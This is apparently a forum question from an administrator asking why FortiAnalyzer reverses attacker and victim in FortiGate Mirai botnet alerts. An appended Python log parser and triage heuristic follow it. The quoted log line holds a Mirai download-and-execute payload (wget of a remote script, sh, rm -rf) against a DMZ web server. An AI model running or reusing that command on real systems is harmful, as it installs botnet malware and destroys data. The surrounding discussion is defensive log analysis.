Illogical reports from FortiAnalyzer
From time to time our FortiGate is logging botnet activity. When I look at the lines in our syslog server, the traffic is listed as incoming from external hosts into our servers in the DMZ. The lines show attempts to install and execute a script in e.g. /tmp, and shortly after the same external host tries to contact the same DMZ server through port 80. The log lines might look something like this:
2021-08-02T21:52:06.158389+02:00 10.1.255.242 date=2021-08-02 time=21:52:04 devname="??????" devid="FGT2KETBXXXXXXXX" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" eventtime=1627933925055431525 tz="+0200" severity="high" srcip=126.96.36.199 srccountry="United States"dstip=10.10.91.89 srcintf="Ytre-aggr" srcintfrole="wan" dstintf="DMZ-1-2" dstintfrole="undefined" sessionid=2238099031 action="dropped" proto=6 service="HTTP" policyid=237 attack="Mirai.Botnet" srcport=37935 dstport=80 hostname="127.0.0.1" url="/shell?cd+/tmp;rm+-rf+*;wget+ 188.8.131.52/jaws;sh+/tmp/jaws" direction="outgoing" attackid=43191 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID43191" incidentserialno=721445630 msg="backdoor: Mirai.Botnet," crscore=30 craction=8192 crlevel="high"
My interpretation of this is an attempt to infect our server – in other words we are the victim, and the external host is the attacker.
Our FortiGate is logging to a FortiAnalyzer at the same time as the syslog server, and after running the log through FortiAnalyzer this is reported the other way around. The external hosts are listed as “Victims” and our servers as “C&C”.
Why is FortiAnalyzer turning this around, and why is it written direction="outgoing" in the log line? Perhaps I have misunderstood the concept, and our servers are indeed infected?
In addition to this, all botnet activity is being dropped by the firewall, so it really never reaches our DMZ server. Why is that not shown in the report?
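As an added example (not from the original post and not Fortinet's own logic), here is a small Python parser for the key=value syslog format shown above, together with a triage heuristic that is my assumption for this illustration: the interface with srcintfrole="wan" marks the external side, srcip/dstip name the session initiator and responder, and action="dropped" means the attempt never reached the DMZ host. The sample line is constructed with documentation addresses, and the direction field is only echoed back, not used for the decision.

```python
import re
from typing import Dict, Optional

# One FortiGate key=value pair: the value is either double-quoted (may contain
# spaces, '=' or ';') or an unquoted run of non-whitespace characters.
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample modelled on the line in the post (addresses are invented).
# The glued srccountry="United States"dstip=... reproduces the quirk seen above.
SAMPLE = (
    '2021-08-02T21:52:06.158389+02:00 10.1.255.242 date=2021-08-02 time=21:52:04 '
    'devname="fw-edge" type="utm" subtype="ips" eventtype="signature" level="alert" '
    'srcip=203.0.113.7 srccountry="United States"dstip=10.10.91.89 srcintf="Ytre-aggr" '
    'srcintfrole="wan" dstintf="DMZ-1-2" dstintfrole="undefined" action="dropped" '
    'proto=6 service="HTTP" attack="Mirai.Botnet" srcport=37935 dstport=80 '
    'url="/shell?cd+/tmp" direction="outgoing" msg="backdoor: Mirai.Botnet,"'
)


def parse_fortigate_line(line: str) -> Dict[str, str]:
    """Return the key=value fields of one FortiGate log line as a dict.

    The syslog prefix (timestamp, relay IP) contains no '=' and is skipped.
    Scanning for the next key instead of splitting on spaces means a quoted
    value glued to the following key still parses correctly.
    """
    fields: Dict[str, str] = {}
    for key, value in _KV.findall(line):
        fields[key] = value[1:-1] if value.startswith('"') else value
    return fields


def triage(fields: Dict[str, str]) -> Dict[str, Optional[object]]:
    """Assumed heuristic: the 'wan' role interface is the untrusted side."""
    src_external = fields.get("srcintfrole") == "wan"
    dst_external = fields.get("dstintfrole") == "wan"
    if src_external and not dst_external:       # external host initiated the session
        initiated_by, remote, internal = "external", fields["srcip"], fields["dstip"]
    elif dst_external and not src_external:     # internal host reached out
        initiated_by, remote, internal = "internal", fields["dstip"], fields["srcip"]
    else:                                        # roles missing or both the same side
        initiated_by, remote, internal = "unknown", None, None
    return {
        "attack": fields.get("attack"),
        "initiated_by": initiated_by,
        "remote_host": remote,
        "internal_host": internal,
        "blocked": fields.get("action") in {"dropped", "blocked", "reset"},
        "ips_direction": fields.get("direction"),  # echoed only, not interpreted
    }


if __name__ == "__main__":
    print(triage(parse_fortigate_line(SAMPLE)))
```

For the sample line this reports an external initiator against the DMZ host with blocked set to True, which is the reading the post itself arrives at; the FortiAnalyzer victim/C&C labelling is a separate question the heuristic does not answer.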